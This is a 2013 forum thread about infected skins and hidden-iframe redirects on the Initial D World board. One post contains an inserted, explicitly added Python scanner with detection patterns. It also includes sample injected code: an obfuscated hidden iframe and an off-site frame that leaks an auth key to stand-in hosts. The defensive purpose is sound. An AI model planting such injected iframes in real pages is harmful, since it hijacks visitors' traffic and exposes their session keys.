Initial D World - Discussion Board / Forums > Announcement Board > Forum Skins Temporarily Disabled


Posted by: Tessou Feb 11 2013, 04:33 PM
A few members have alerted me to the presence of infected code in some of the skins available on IDW.

While we work on correcting the problem and clean up the problem areas, all skins except for IPB Skin Set 1.2 are disabled for all members (including staff like myself). The menu for selecting skins has been removed from all site pages until further notice.

It will not be like this for long. Expect skin selection to come back in less than a week.

Posted by: Nomake Wan Feb 11 2013, 05:16 PM
Thank you for the heads-up, great work! happy.gif

EDIT: Uh, looks like the 'Mark all posts as read' function on IPB default got nuked accidentally! Help!

EDIT 2: Temp link for people like me who rely on it:

https://idforums.net/index.php?act=Login&CODE=05

Posted by: Lebon14 Feb 11 2013, 05:46 PM
QUOTE (Tessou @ 1 hour, 12 minutes ago)
A few members have alerted me to the presence of infected code in some of the skins available on IDW.

While we work on correcting the problem and clean up the problem areas, all skins except for IPB Skin Set 1.2 are disabled for all members (including staff like myself). The menu for selecting skins has been removed from all site pages until further notice.

It will not be like this for long. Expect skin selection to come back in less than a week.

Oh, okay, I was wondering why. Thanks!

Posted by: ThrasherDBS Feb 11 2013, 06:26 PM
When everything is fixed, will it remember the skin we had previously, or will we have to go into our control panel and reset it?

Thank you for taking the time to correct the issue.

Posted by: Nerubian Feb 11 2013, 06:56 PM
Does anyone else get virus alerts when clicking on the "View New Posts" link?

Posted by: kyonpalm Feb 11 2013, 07:21 PM
QUOTE (Nerubian @ 24 minutes, 48 seconds ago)
Does anyone else get virus alerts when clicking on the "View New Posts" link?

How are you even still seeing that? Shouldn't it be gone along with "Mark all posts as read"?

Posted by: Nomake Wan Feb 11 2013, 08:14 PM
QUOTE (Nerubian @ 1 hour, 17 minutes ago)
Does anyone else get virus alerts when clicking on the "View New Posts" link?

There shouldn't be virus alerts on that function as--if I recall correctly--it is using pure IPB code to run. The problem only affects non-IPB code. Something may be wrong on your end. Can you take a screenshot of the problem and PM it?

Posted by: Rudy Feb 11 2013, 11:15 PM
Boy, am I glad I bothered to read before posting. Thanks for the heads up. I miss my minimalist skin ;_;

Posted by: THE_HONDA_CG2 Feb 11 2013, 11:52 PM
Yeah, I caught something early this morning when I was making my rounds. It popped up briefly on my screen before it went away. Man it was one hell of a way to wake up! At least it wasn't a creepy picture of a screaming zombie or something. Spoiler'd because it might be a tad NSFW.


Posted by: s12drifter Feb 12 2013, 01:46 AM
That looks Russian :x But anyway, yeah, I miss my dark gray skin. Oh, how will I go on in life without it!!!! :x This white skin is WAY too bright :x

Posted by: kazahana Feb 12 2013, 03:45 AM
Got a shock for a moment, and saw this thread. Good work Pear Pear.

Posted by: Nomake Wan Feb 12 2013, 03:49 AM
QUOTE (kazahana @ 4 minutes, 3 seconds ago)
Got a shock for a moment, and saw this thread. Good work Pear Pear.

Thank Tessou, not Pear. smile.gif

Posted by: Btown86 Feb 12 2013, 05:04 AM
I knew something looked different this morning when I got on the site; I just couldn't figure it out till I saw this thread. haha

Posted by: Tessou Feb 12 2013, 05:13 AM
QUOTE (ThrasherDBS @ Yesterday, 10:26 PM)
When everything is fixed, will it remember the skin we had previously, or will we have to go into our control panel and reset it?

Thank you for taking the time to correct the issue.

Unfortunately, the forum will not remember what you were using, so you will have to go and change it back to what you used once we reactivate skins.

This is because I turned off skin selection and then forced all members to use the current skin, effectively locking them out of the other selections. This meant that the system considers that all members chose this skin on their own, so when the other skins become available, you will have to choose them to set them as your default instead of what you see right now.

Posted by: Nomake Wan Feb 12 2013, 05:15 AM
Thanks to Honda_CG2 and SgtXDNX, I've found a much more massive problem than initially expected, one that has likely been plaguing the forums for weeks undetected. Either that, or it really has just started up again recently...which would be a best-case scenario, to be honest.

Either way, please note that the forums are currently infected beyond repair at least until Perry returns from overseas. The only solution is to close the forums entirely as a temporary measure. Tessou, I have PM'd you with the information.

In the meantime, I'm sick of keeping this quiet. Mods, if I come back and find out my post has been edited, then I can be absolutely sure that you're more concerned about covering your asses than you are about security or keeping the member base safe and in the loop.

Point is, guys, the forum's javascript was infected by an iframe that was forcing browsers to invisibly visit some stupid photography site to boost that site's hits. This would only be triggered when a javascript function was called, such as the smileys in posts or the spell checker in the non-IPB-default skins. Most javascript functions were cleaned by Perry before he left, but the spell-checker in the non-IPB-default skins was still infected. I figure this may be because Perry, like me, only uses the default skin and therefore didn't catch the extra javascript file that those skins use.

However, I've now come to find out that IPB itself appears to be infected. I'm not sure of the vector for this one, unfortunately, but it doesn't appear to be javascript-based. It's embedded in all transfer functions--making posts, editing posts, logging in, changing your avatar, etc. It's a redirect script on a massive scale, redirecting to various websites in Russia. On top of that, those redirects include your authorization key, since that key is sent in plaintext via the URL. While the pass_hash function is indeed part of this interaction, I do not believe it is actually transmitted, as that function loads well before the infected code runs. The infected code itself appears to be an IPB-specific version of the very same traffic-pumping infection that had been in the Javascript, albeit to a site in Russia instead of a photography site.

I've already pored over the source code for the forum pages that lead to the affected redirects and the source stylesheets and javascript functions are all clean. That means only one thing: IPB itself is what's infected. The forums must be shut down temporarily.

See you when this is resolved, all. I'm out.
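The two symptoms described in this post, skin javascript that invisibly writes an iframe to an outside site and page content that frames an off-site URL with the user's authorization key in the query string, can both be looked for with a static check over the downloaded files. The following is an added example for this thread, not IDW's or IPB's own code; the sample javascript and HTML, the `example.invalid` domain names and the list of parameter names treated as sensitive are all constructed for the example.

```python
"""Static checks for injected hidden-iframe / redirect code in forum skin files.
Added example; not IDW or IPB code. Sample inputs below are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Assumed parameter names whose presence in an off-site URL is worth flagging.
SENSITIVE_PARAMS = {"auth_key", "pass_hash", "session_id", "sid"}

# Patterns typical of injected traffic-pumping code in a javascript file.
JS_PATTERNS = {
    "iframe written by script": re.compile(
        r"document\.write\s*\(.*(?:<|%3C)\s*iframe", re.I | re.S),
    "script-driven redirect": re.compile(
        r"(?:window\.|document\.|top\.)?location(?:\.href)?\s*=(?!=)\s*['\"]https?://", re.I),
    "string-decoding obfuscation": re.compile(
        r"(?:unescape|String\.fromCharCode|eval)\s*\(", re.I),
}


def scan_js(js_source):
    """Return the names of the suspicious patterns found in a javascript file."""
    return [name for name, rx in JS_PATTERNS.items() if rx.search(js_source)]


class _RefCollector(HTMLParser):
    """Collects iframe attributes and the src/href of every loadable resource."""
    def __init__(self):
        super().__init__()
        self.iframes = []
        self.refs = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            self.iframes.append(a)
        if tag in ("iframe", "script", "img", "link"):
            self.refs.append(a.get("src") or a.get("href") or "")


def _is_hidden(attrs):
    """True for the usual ways an injected frame is kept out of sight."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    dims = [str(attrs.get(k) or "").rstrip("px") for k in ("width", "height")]
    tiny = all(d in ("0", "1") for d in dims)
    return ("display:none" in style or "visibility:hidden" in style
            or re.search(r"(?:left|top):-\d{3,}", style) is not None or tiny)


def scan_html(html_source, site_host):
    """List iframes that are off-site or hidden, noting sensitive query parameters."""
    p = _RefCollector()
    p.feed(html_source)
    findings = []
    for attrs in p.iframes:
        src = attrs.get("src") or ""
        u = urlsplit(src)
        offsite = bool(u.netloc) and u.netloc.lower() != site_host.lower()
        hidden = _is_hidden(attrs)
        if not (offsite or hidden):
            continue
        leaked = sorted(set(parse_qs(u.query)) & SENSITIVE_PARAMS)
        findings.append({"src": src, "offsite": offsite,
                         "hidden": hidden, "leaked_params": leaked})
    return findings


def offsite_hosts(html_source, site_host):
    """Every host other than site_host that the page would contact when loaded."""
    p = _RefCollector()
    p.feed(html_source)
    hosts = {urlsplit(r).netloc.lower() for r in p.refs}
    return sorted(h for h in hosts if h and h != site_host.lower())


# Constructed samples (not real IDW files).
CLEAN_JS = "function showSmilies(id){ document.getElementById(id).style.display='block'; }"
INFECTED_JS = (CLEAN_JS + "\n"
               "document.write(unescape('%3Ciframe src=\"http://photos.example.invalid/\" "
               "width=0 height=0%3E%3C/iframe%3E'));")
CLEAN_HTML = ('<div><iframe src="https://idforums.net/embed" width="400" height="300">'
              '</iframe></div>')
INFECTED_HTML = ('<div><iframe src="http://promo.example.invalid/?auth_key=deadbeef&ref=1" '
                 'style="display:none" width="0" height="0"></iframe></div>')

if __name__ == "__main__":
    for label, js in (("clean.js", CLEAN_JS), ("spellcheck.js", INFECTED_JS)):
        print(label, scan_js(js))
    for label, html in (("clean.html", CLEAN_HTML), ("post.html", INFECTED_HTML)):
        print(label, scan_html(html, "idforums.net"), offsite_hosts(html, "idforums.net"))
```

Run against a directory of skin files, the javascript check is the one that catches the "extra javascript file that those skins use" case, while `offsite_hosts` gives the list of domains a page would quietly contact, which is the quickest way to tell a clean page from one that still pumps traffic elsewhere.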

Posted by: Tessou Feb 12 2013, 05:20 AM
This is something that the mod team did not detect, and we weren't keeping anything hush-hush, so there's no worries as to having anything redacted. You and many other members have done a fantastic job letting us know what's going on, especially considering that the mod team itself has not reported any problems on the site, aside from Honda in this thread. The staff section has been quiet for weeks.

This is a serious matter, and I am heavily considering your suggestion of shutting the site down as a safety measure until we can hammer out this infection.

Posted by: Spaz Feb 12 2013, 05:37 AM
That's... unfortunate. But then again, it's something that comes with the territory when using software this old.

I hadn't noticed anything myself.

Posted by: RedsunsF1 Feb 12 2013, 07:13 AM

Thought my account got deleted for a second haha facepalm.gif
Thanks for the heads up

Posted by: Nomake Wan Feb 12 2013, 05:23 PM
QUOTE (Tessou @ Today, 5:20 AM)
This is something that the mod team did not detect, and we weren't keeping anything hush-hush, so there's no worries as to having anything redacted. You and many other members have done a fantastic job letting us know what's going on, especially considering that the mod team itself has not reported any problems on the site, aside from Honda in this thread. The staff section has been quiet for weeks.

This is a serious matter, and I am heavily considering your suggestion of shutting the site down as a safety measure until we can hammer out this infection.

Now that we're back, allow me to formally apologize if it seemed I was 'attacking' you or the way you run the site. This was not the case--I don't believe you and I have ever discussed the situations that have affected the site's code, and so it was actually what I had been told by other moderating team members during the first incident that I was rallying against. Generally I got the idea that security issues were to be kept 'hush-hush', but this one was so huge that I just felt I couldn't stay quiet about it.

Again, my apologies... and welcome back, IDW! cool.gif

Posted by: HorizontalMitsubishi Feb 12 2013, 07:29 PM
If you need help cleaning up the site, I've been doing more and more of that lately, I had two VB based forums get hit and a wordpress site get hit.

Posted by: Nomake Wan Feb 12 2013, 08:01 PM
QUOTE (HorizontalMitsubishi @ 31 minutes, 36 seconds ago)
If you need help cleaning up the site, I've been doing more and more of that lately, I had two VB based forums get hit and a wordpress site get hit.

It looks like we're all good now and thankfully it wasn't actually the forum software that was vulnerable. smile.gif So easy it could be done from China!

Posted by: Tessou Feb 13 2013, 08:53 AM
QUOTE (Nomake Wan @ Yesterday, 9:23 PM)
Now that we're back, allow me to formally apologize if it seemed I was 'attacking' you or the way you run the site. This was not the case--I don't believe you and I have ever discussed the situations that have affected the site's code, and so it was actually what I had been told by other moderating team members during the first incident that I was rallying against. Generally I got the idea that security issues were to be kept 'hush-hush', but this one was so huge that I just felt I couldn't stay quiet about it.

Again, my apologies... and welcome back, IDW! cool.gif

I never read it that way, so it's all good. No worries. happy.gif

Posted by: Möbius Feb 13 2013, 09:06 AM
Just got back, my skin is as set before, thanks for the heads up a couple pages up, Don.

Posted by: Nerubian Feb 13 2013, 10:04 AM
QUOTE (Nomake Wan @ Yesterday, 5:14 AM)
There shouldn't be virus alerts on that function as--if I recall correctly--it is using pure IPB code to run. The problem only affects non-IPB code. Something may be wrong on your end. Can you take a screenshot of the problem and PM it?

Virus alerts don't appear anymore now.

Posted by: RedsunsF1 Feb 13 2013, 10:06 AM
I had to re-select the skin again but that's not a problem.
Glad it's all working again.

Posted by: Nomake Wan Feb 13 2013, 10:19 AM
QUOTE (Nerubian @ 15 minutes, 28 seconds ago)
Virus alerts don't appear anymore now.

Well yeah, but it's...nah, never mind. We're back so I'm gonna make an announcement post.

EDIT: Scratch that, I can't.

Anyway, the gist of it is that while IDW was affected by some unscrupulous individuals sending traffic to other countries, there's a chance that all members on Windows PCs have been affected by some payload or another. The actual problem itself was non-malicious--that is, it did not drop a payload, it simply pumped traffic to certain websites. However, those websites themselves may have carried a malware payload.

As such I am recommending that all members with Windows PCs who browsed the forum from February 9th until now run a malware scanner on their machine(s). A quick scan with Malwarebytes Anti-Malware should suffice to let you know if you have nasties on your machine or not. If you do, run a full scan afterward to make sure you nailed it. If you don't want to install something, Panda Antivirus has a good online scanner on their website.

There's also Sophos's offline scanner for really nasty bugs (like rootkits), but, on top of the fact that I don't think any rootkits were involved with this incident, that scanner has no user-selectable options and will cause problems afterward if used. It's kind of like using a nuclear bomb to kill a cockroach. Sure, it'll work, but the collateral damage will make you wonder if you did the right thing.

Those of you on Mac OS X, Linux or a mobile device would not have been affected.

Posted by: Spaz Feb 14 2013, 09:12 PM
Not sure if this is due to a recent database update where info was collected pre-codefix, or if it's new, but here you go:

(image: http://i40.photobucket.com/albums/e230/cmspaz/idwinfection_zps97357378.png)

Posted by: Nomake Wan Feb 14 2013, 10:12 PM
QUOTE (Spaz @ 1 hour, 0 minutes ago)
Not sure if this is due to a recent database update where info was collected pre-codefix, or if it's new, but here you go:

http://i40.photobucket.com/albums/e230/cmspaz/idwinfection_zps97357378.png

It says that it was collected 2/14, which would be today. However, that's the main drop website and not the forums, so I have no say in the matter. I haven't visited go2id in over half a decade. sad.gif

It's entirely possible that something's on go2id though. IDW and WME appear to be clean but I'm not sure if go2id was actually checked.

Posted by: Spaz Feb 15 2013, 05:31 AM
QUOTE (Nomake Wan @ 7 hours, 18 minutes ago)
It says that it was collected 2/14, which would be today. However, that's the main drop website and not the forums, so I have no say in the matter. I haven't visited go2id in over half a decade. sad.gif

It's entirely possible that something's on go2id though. IDW and WME appear to be clean but I'm not sure if go2id was actually checked.

The red banner stays on idforums.net, but goes away once you get deeper.

Posted by: Nomake Wan Feb 15 2013, 07:05 AM
QUOTE (Spaz @ 1 hour, 33 minutes ago)
The red banner stays on idforums.net, but goes away once you get deeper.

I haven't found any malicious content on the forums themselves so I'm not sure why it would. What happens if you go to the forums (with the red banner showing) then press CTRL+F5? Does the banner go away?

Posted by: Spaz Feb 15 2013, 10:53 AM
QUOTE (Nomake Wan @ 3 hours, 47 minutes ago)
I haven't found any malicious content on the forums themselves so I'm not sure why it would. What happens if you go to the forums (with the red banner showing) then press CTRL+F5? Does the banner go away?

I can check when I get home from work. Comps are preloaded with IE and we can't install anything. dry.gif

Posted by: Spaz Feb 15 2013, 03:16 PM
QUOTE (Nomake Wan @ 8 hours, 11 minutes ago)
I haven't found any malicious content on the forums themselves so I'm not sure why it would. What happens if you go to the forums (with the red banner showing) then press CTRL+F5? Does the banner go away?

Banner stays.

However, if I go directly to the forum, not via the go2id gateway page, the banner does not appear.

Posted by: kyonpalm Feb 15 2013, 03:19 PM
QUOTE (Spaz @ 2 minutes, 53 seconds ago)
Banner stays.

However, if I go directly to the forum, not via the go2id gateway page, the banner does not appear.

Sounds to me like there's a bit of code on the main site that still loads extra links invisibly. If I'm not mistaken, whenever you loaded a page on the forums when they were infected, it would also invisibly load this photography website (or maybe it was the Russian one...) Maybe that's what's happening, except on the main site instead of the forums which are clean. That would explain why loading the forums directly instead of using the portal on the main site solves the problem.

Posted by: Nomake Wan Feb 15 2013, 04:36 PM
QUOTE (kyonpalm @ 1 hour, 17 minutes ago)
Sounds to me like there's a bit of code on the main site that still loads extra links invisibly. If I'm not mistaken, whenever you loaded a page on the forums when they were infected, it would also invisibly load this photography website (or maybe it was the Russian one...) Maybe that's what's happening, except on the main site instead of the forums which are clean. That would explain why loading the forums directly instead of using the portal on the main site solves the problem.

The photography one was only in certain functions--it wasn't built into the forum bits. The Russian one was built into the forum bits.

I'll check out go2id with my packet sniffer and see what comes up. Thanks for the report, Spaz.

EDIT: go2id.net is very much being affected by the very same attack that had been leveraged on the forums' functions. As of now Go2ID is not a valid site but as far as I know there's no way to shut down access to it at this time since it is not actually connected to the forums in any way.

All I can say is, stop using Go2ID. The forums themselves are perfectly clean.

Posted by: Spaz Feb 15 2013, 05:39 PM
You're very welcome. Just passing along what I find.

Posted by: kyonpalm Feb 15 2013, 05:46 PM
QUOTE (Nomake Wan @ 1 hour, 9 minutes ago)
EDIT: go2id.net is very much being affected by the very same attack that had been leveraged on the forums' functions.

Exactly as I predicted.

Posted by: THE_HONDA_CG2 Feb 18 2013, 08:49 PM
So uh guys. I don't know what this means but I think I should bring this to your attention. I've never gotten anything like this before so um... Yeah. What do you make of it?

(image: http://i.minus.com/jw5TWBLF2TPUk.png)

Posted by: Nomake Wan Feb 19 2013, 12:00 AM
QUOTE (THE_HONDA_CG2 @ 3 hours, 10 minutes ago)
So uh guys. I don't know what this means but I think I should bring this to your attention. I've never gotten anything like this before so um... Yeah. What do you make of it?

http://i.minus.com/jw5TWBLF2TPUk.png

How did you get that? Did you use go2id.net before entering the forums?

Posted by: THE_HONDA_CG2 Feb 19 2013, 12:07 AM
I tried checking this thread through this link: https://idforums.net/index.php?showtopic=45369 and that is where I got the warning. It's the AE86 plush doll~ thread.

Posted by: Nomake Wan Feb 19 2013, 12:24 AM
QUOTE (THE_HONDA_CG2 @ 17 minutes, 39 seconds ago)
I tried checking this thread through this link: https://idforums.net/index.php?showtopic=45369 and that is where I got the warning. It's the AE86 plush doll~ thread.

As reported in IRC, the n00b posting in that thread stole his avatar from go2id directly. This is where the warning comes from. Also, the guy is an idiot who not only stole the image but didn't bother to resize it properly or host it on an actual image host.

Buckets full of fail. Buckets full of fail everywhere. facepalm.gif

Posted by: Tessou Feb 19 2013, 08:02 AM
So... what to do? I'm at the ready to get stuff done.

Edit: nvm, it appears from board logs that Honda already removed the guy's avatar. That leak is plugged, at least.

Posted by: Nomake Wan Feb 19 2013, 08:48 AM
It's unfortunate that there's no way to set up a forum-level block of the go2id domain temporarily. I wouldn't even know how to begin doing that and with what little experience I have messing with IPB I don't think there's a forum-level way to do that. Pretty sure it would only be possible at the VPS.

If we had access to that, though, we could just fix go2id instead. tongue.gif

Posted by: THE_HONDA_CG2 Feb 19 2013, 08:50 AM
QUOTE (Tessou @ 47 minutes, 47 seconds ago)
So... what to do? I'm at the ready to get stuff done.

Edit: nvm, it appears from board logs that Honda already removed the guy's avatar. That leak is plugged, at least.

Yeah, Boss, N1 told me in the IRC to go in and take out his avatar. It was a clean job. That was quite an adventure, to say the least. I'll keep an eye out for things like this in the future too.

Posted by: Tessou Feb 19 2013, 12:55 PM
You're all doing a great job of keeping the rest of us informed. A few of us, myself included, are not seeing these errors or malware alerts in any shape or form.

Posted by: HorizontalMitsubishi Feb 19 2013, 03:36 PM
I'm not seeing any alert on idforums.net but go2id.net is still throwing errors in Google, Firefox and Chrome.

So after taking literally a 30-second look at go2id.net, here is what I found.

But as I've said, if you need help with the clean up, you know where to find me.

Posted by: Nomake Wan Feb 19 2013, 03:56 PM
idforums.net was only showing an alert for the thread Honda mentioned because a user in that thread was stealing his avatar from go2id.net, which has the alert.

The infection vector, content and disinfection method have been known this whole time--as you displayed those are the very same infections that had been on idforums.net in the past. As such ridding the domain of those problems is not a matter of expertise but rather one of access. Perry is the only person who can do it because he's the only one with access to those files to make changes. Perry isn't here. As soon as he's back he can fix the whole domain in one swoop in all of five seconds, just as he did with idforums.net.

Powered by Invision Power Board (http://www.invisionboard.com)
© Invision Power Services (http://www.invisionpower.com)